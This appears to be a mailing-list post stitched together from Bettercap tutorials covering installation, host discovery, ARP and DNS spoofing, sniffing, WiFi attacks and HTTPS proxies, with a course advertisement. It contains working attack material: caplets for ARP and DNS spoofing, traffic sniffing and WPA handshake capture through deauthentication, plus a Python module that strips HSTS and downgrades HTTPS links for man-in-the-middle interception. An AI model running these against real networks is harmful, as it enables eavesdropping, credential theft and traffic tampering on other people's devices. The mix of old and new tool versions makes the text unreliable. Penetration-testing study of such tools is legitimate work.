Bettercap Latest Version


Rita Seliba

Aug 5, 2024, 1:06:48 PM
to verbstearulhot
bettercap supports GNU/Linux, BSD, Android, Apple macOS and Microsoft Windows. Depending on whether you want the latest stable release or the bleeding edge from the GitHub repository, you have several installation choices.

BetterCAP is containerized using Alpine Linux, a security-oriented, lightweight Linux distribution based on musl libc and BusyBox. The resulting Docker image is relatively small and its dependencies are easy to manage. Since the image uses a multi-stage build, Docker 17.05 or later is required.


Bettercap, a portable framework written in Go, is often described as a Swiss army knife because of its broad capabilities: network reconnaissance, WiFi attacks, and scanning of Bluetooth Low Energy devices and Ethernet networks.


Bettercap allows you to leverage all the features needed to analyze networks and devices and builds upon classic tools like Ettercap to create an advanced modern suite for wired and wireless network attacks.


This lets an attacker sit between two devices and eavesdrop on sensitive communications, modify data in transit, or impersonate devices to gain unauthorized access to systems and services.


If you are installing it on Docker, compiling from source, compiling on Android, or deploying on other Linux distributions (like Ubuntu or Fedora based ones), visit the Installation Page on the official website.


The first step is to use the net.probe module to discover hosts on the network. Bettercap does this by sending probe packets to every IP address in the subnet and recording which hosts answer. Start probing with net.probe on; the hosts found so far are listed with net.show.


In the tutorial's lab network the module discovered three devices, with IP addresses ending in 133, 134, and 135. At this point we could use additional tools such as Nmap to explore and validate these hosts further.


By default only traffic between the targets and the external network (that is, traffic passing through the gateway) is spoofed. If you set arp.spoof.internal to true, ARP spoofing also covers traffic exchanged between devices on the local network.


Sniffing the traffic also allows us to see all web traffic by the Windows machine. This can give us insight into the user's online activities, expose sensitive information they transmit or request, and potentially harvest login credentials if they visit sites using cleartext HTTP.


DNS spoofing lets us answer a victim's DNS queries with any address we choose, sending them to a host we control. Sitting in the middle of the traffic gives us considerable power to redirect, monitor, and potentially manipulate the data exchange, which can be abused for phishing, credential harvesting, or malware delivery.


Bettercap also includes a fast port scanner, the syn.scan module. Although less complete than dedicated scanners like Nmap or RustScan, it lets you run a SYN scan against any targets located during host discovery and attempts banner grabbing on the open ports it finds.
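The wired part of the procedure above (host discovery, targeted ARP spoofing, sniffing, DNS spoofing, SYN scan) collected into one caplet, as an added example that is not part of the original tutorial. It assumes a lab network of 192.168.1.0/24 with the three discovered hosts at .133 to .135, the attacker machine at 192.168.1.50, and a bettercap 2.x install; the spoofed domain and the port range are arbitrary choices for illustration.

```caplet
# mitm.cap (assumed lab network 192.168.1.0/24); run with:
#   sudo bettercap -iface eth0 -caplet mitm.cap

# 1. host discovery: probe the subnet, wait for answers, list them
net.probe on
sleep 5
net.show

# 2. ARP spoofing, restricted to the three hosts found above instead of
#    the whole subnet, and including traffic between the targets themselves
set arp.spoof.targets 192.168.1.133,192.168.1.134,192.168.1.135
set arp.spoof.internal true
set arp.spoof.fullduplex true
arp.spoof on

# 3. sniffing, limited by a BPF filter to cleartext web traffic
set net.sniff.verbose true
set net.sniff.filter "tcp port 80"
net.sniff on

# 4. DNS spoofing for one domain only, pointing it at the attacker box;
#    dns.spoof.all stays false so other queries are left alone
set dns.spoof.domains example.com,*.example.com
set dns.spoof.address 192.168.1.50
set dns.spoof.all false
dns.spoof on

# 5. SYN scan of ports 1-1024 across the discovered range
syn.scan 192.168.1.133 192.168.1.135 1 1024
```

Keeping arp.spoof.targets to the hosts you actually mean to test is the single most important line here: without it bettercap poisons every address on the segment, which is noisy and can disrupt hosts that were never in scope.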


For example, it can send de-authentication or disassociation packets to force devices to reconnect, enabling the capture of the four-way handshake for offline cracking, and it can also create a rogue access point to lure devices into connecting.


To see a list of all discovered access points, use the command wifi.show, which will display a table of found SSIDs with the corresponding BSSID, encryption type, WPS version, the number of connected clients, and data sent and received.
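The wireless steps (recon, wifi.show, deauthentication to capture the WPA handshake) as a second added caplet, again not from the original tutorial. It assumes wlan0 supports monitor mode and that AA:BB:CC:DD:EE:FF is the BSSID of the access point you are authorised to test.

```caplet
# wifi.cap (assumed interface wlan0, assumed target BSSID); run with:
#   sudo bettercap -iface wlan0 -caplet wifi.cap

# where captured 4-way handshakes are written for offline cracking
set wifi.handshakes.file /tmp/handshakes.pcap

# channel-hop and collect access points and their clients
wifi.recon on
sleep 10
set wifi.show.sort clients desc
wifi.show

# lock recon to the one AP in scope, then deauthenticate its clients so they
# reconnect and the handshake can be captured
wifi.recon AA:BB:CC:DD:EE:FF
wifi.deauth AA:BB:CC:DD:EE:FF
```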


Throughout our tutorial, we walked you through installing Bettercap, discussed its flexibility via built-in modules, and explored techniques like ARP spoofing, traffic sniffing, and DNS spoofing with practical examples.


Are you looking to dive deeper into network recon or penetration testing? Then, join the StationX Community for courses on these topics and take advantage of our many benefits, including mentorship, career guidance, and more.


Bettercap is a powerful MitM attack tool, including ARP and DNS spoofing. It offers functionalities for scanning WiFi networks, executing de-authentication attacks, performing MouseJacking, harvesting credentials, and conducting port scans.


Bettercap is a powerful network sniffer. The net.sniff module captures and displays packets from the network interface and is used to analyze traffic passing through the machine it runs on, including traffic redirected to it by ARP spoofing.


Bettercap is more advanced than Ettercap regarding stability, usability, and features. Bettercap addresses many of the limitations found in Ettercap and offers a modern all-in-one solution for network reconnaissance.


Nevertheless we can simplify the concept with an example. When you connect to some network (your home network, some public WiFi, Starbucks, etc.), the router/switch is responsible for forwarding all of your packets to the correct destination. During a MITM attack we "force" the network to consider our device as the router (we "spoof" the original router/switch address in some way):


Once this happens, all of the network traffic goes through your computer instead of the legitimate router/switch, and at that point you can do pretty much anything you want, from just sniffing for specific data (emails, passwords, cookies, etc. of other people on your network) to actively intercepting and proxying all the requests of some specific protocol in order to modify them on the fly (you can, for instance, replace all images on all websites being visited by everyone, kill connections, etc.).


Instead of the stable release, you can also clone the source code from the GitHub repository. This gives you all the latest and experimental features, but remember that you are then running a potentially unstable build:


The following are the main options that determine the general behaviour of BetterCap. None of them is mandatory; bettercap automatically detects everything it needs in order to work, and you only need one or more of these options to request a custom behaviour in specific cases.


BetterCAP automatically detects your default network interface and uses it. If you want it to use another interface (when you have more than one, say eth0 and wlan0), you can use this option.


If no specific target is given on the command line, bettercap will spoof every address on the network. When you already know the IP or MAC address of your target(s), use this option to restrict spoofing to them.


BetterCap already includes an ARP spoofer (working in both full-duplex and half-duplex mode, the latter being the default), a DNS spoofer and, as the project describes it, the first fully working and completely automated ICMP DoubleDirect spoofer.


By default bettercap only parses packets going to or coming from other addresses on the network. If you also want to process packets sent or received by your own computer, use this option (note: it enables the sniffer).


Bettercap ships with HTTP/HTTPS (with SSL stripping and HSTS bypass) and raw TCP transparent proxies that you can use to manipulate HTTP/HTTPS or low-level TCP traffic at runtime. For instance, you could use the HTTP/HTTPS proxy to inject JavaScript into the pages the targets visit (BeEF would be a great choice :D) or replace all the images, and use the TCP one for other protocols (downgrade encryption with STARTTLS, dump custom protocols and so forth).


By default the built-in proxies do nothing but log the HTTP(S) requests they see. If you pass a --proxy-module argument you can load one of the built-in modules (or your own) and manipulate all the traffic as you like: inject JavaScript into the pages the targets visit, replace the images, and so on.


You can easily implement a module that injects data into pages or just inspects requests and responses by creating a Ruby file and passing it to bettercap with the --proxy-module argument. The following is a sample module that injects some content into the title tag of each HTML page; you can find other example modules in the dedicated proxy-modules repository.


Moreover, HSTS policies have been preloaded into the major browsers, meaning that even with an SSL stripping attack running, the browser will connect over HTTPS anyway, even when an http:// URL is given explicitly, making the attack itself useless.


For this reason, Leonardo Nve Egea presented sslstrip+ (or sslstrip2) at Black Hat Asia 2014. This tool was an improvement over Moxie Marlinspike's original, created specifically to bypass HSTS policies. Since HSTS rules are usually applied per hostname, the trick is to downgrade HTTPS links to HTTP and to prepend a custom subdomain label to them. The resulting hostnames are not valid for any real DNS server, but since we are in the middle we can resolve them ourselves.


When the "victim" clicks on such a link, no HSTS rule applies (there is none for the subdomain we just invented) and the MITM software (BetterCap in our case ^_^) takes care of the DNS resolution, allowing us to see and alter traffic we were not supposed to see.
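The two response-rewriting ideas above, the title-injecting proxy module and the sslstrip+ style HSTS bypass, as one added Python example. This is not bettercap's code or its proxy-module API; it shows only the logic such a module runs on each HTTP(S) response, the header handling that goes with it, and the two pieces the other side of the MITM needs: the DNS spoofer answering the invented hostnames, and the proxy mapping a victim's fake Host back to the real HTTPS origin. The "wwww." label, the sample page and headers, and the attacker address are all constructed for illustration; the real tools pick their own prefix. One caveat the text only hints at: if the real domain's HSTS policy carries includeSubDomains (or is preloaded with it), a label prepended under that domain is still covered and the downgrade fails.

```python
"""Illustrative SSL-strip / HSTS-bypass response rewriting (added example,
not bettercap's own implementation)."""
import re
from urllib.parse import urlsplit, urlunsplit

BYPASS_PREFIX = "wwww."  # assumed label; anything the victim has no HSTS rule for

# https:// URLs as they appear in HTML or headers; stops at quotes, <>, whitespace
_HTTPS_URL = re.compile(r"https://[A-Za-z0-9.-]+(?::\d+)?[^\s\"'<>]*")


def downgrade_host(host: str) -> str:
    """Hostname the victim is sent to instead of `host`.  HSTS is keyed on the
    exact hostname (plus subdomains only with includeSubDomains), so turning
    www.example.com into wwww.example.com usually hits no cached rule."""
    if host.startswith("www."):
        return BYPASS_PREFIX + host[len("www."):]
    return BYPASS_PREFIX + host


def downgrade_link(url: str, hostmap: dict) -> str:
    """https://host/... -> http://<fake host>/..., remembering fake -> real.
    The map is needed because 'wwww.' alone is ambiguous on the way back."""
    p = urlsplit(url)
    if p.scheme != "https" or not p.hostname:
        return url
    fake = downgrade_host(p.hostname)
    hostmap[fake] = p.hostname
    netloc = fake if p.port is None else f"{fake}:{p.port}"
    return urlunsplit(("http", netloc, p.path, p.query, p.fragment))


def rewrite_html(body: str, content_type: str, hostmap: dict, banner: str) -> str:
    """What an on-response hook does: touch only HTML, downgrade every https://
    link in it, and inject `banner` right after the first <title> tag."""
    if not content_type.lower().startswith("text/html"):
        return body
    body = _HTTPS_URL.sub(lambda m: downgrade_link(m.group(0), hostmap), body)
    return re.sub(r"(<title[^>]*>)", lambda m: m.group(1) + banner, body,
                  count=1, flags=re.IGNORECASE)


def rewrite_headers(headers: dict, hostmap: dict) -> dict:
    """Drop Strict-Transport-Security so the victim never caches a policy, and
    downgrade Location, the usual way a site moves a client onto HTTPS."""
    out = {}
    for name, value in headers.items():
        key = name.lower()
        if key == "strict-transport-security":
            continue
        if key == "location":
            value = downgrade_link(value, hostmap)
        out[name] = value
    return out


def upstream_target(request_host: str, hostmap: dict) -> tuple:
    """Proxy side of a victim request: map the fake Host header back to the
    real hostname and talk HTTPS to the real server; anything else passes."""
    real = hostmap.get(request_host)
    return (request_host, "http") if real is None else (real, "https")


def spoofed_dns_answer(qname: str, hostmap: dict, attacker_ip: str):
    """DNS spoofer side: the invented names resolve nowhere on real DNS, so the
    MITM answers them with its own proxy address; other names are forwarded."""
    return attacker_ip if qname.rstrip(".") in hostmap else None


# Constructed sample response (not captured from any real site)
SAMPLE_HTML = (
    '<html><head><title>Example Bank</title></head><body>'
    '<a href="https://www.example.com/login">Log in</a>'
    '<img src="https://cdn.example.com:8443/logo.png">'
    '<a href="http://plain.example.org/">plain</a></body></html>'
)
SAMPLE_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Location": "https://www.example.com/account",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
}

if __name__ == "__main__":
    hostmap = {}
    print(rewrite_headers(SAMPLE_HEADERS, hostmap))
    print(rewrite_html(SAMPLE_HTML, SAMPLE_HEADERS["Content-Type"],
                       hostmap, " !!! injected !!! "))
    print(hostmap)
    print(upstream_target("wwww.example.com", hostmap))
    print(spoofed_dns_answer("wwww.example.com", hostmap, "192.168.1.50"))
```

The hostmap is the state shared between the three roles: the HTML/header rewriter fills it, the DNS spoofer consults it to decide which queries to answer with the attacker's address, and the proxy consults it to reconnect to the genuine origin over TLS. Note that the sample HSTS header carries includeSubDomains, which is exactly the case where a browser that had already seen that header would refuse the downgraded link.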


If you want to actively modify packets of a TCP protocol other than HTTP or HTTPS, you need the TCP proxy. This event-based proxy lets you intercept anything sent to or received from a specific host using your own custom module.


If you want to actively modify packets of a UDP protocol, you need the UDP proxy. Like the TCP proxy, it is event-based and lets you intercept anything sent to or received from a specific host using your own custom module.


If you want to use a custom proxy of your own (Burp Suite, for instance, or some app you wrote), you can still use bettercap to make the whole process easier: no more fragile shell scripts to apply custom firewall rules and launch esoteric commands!
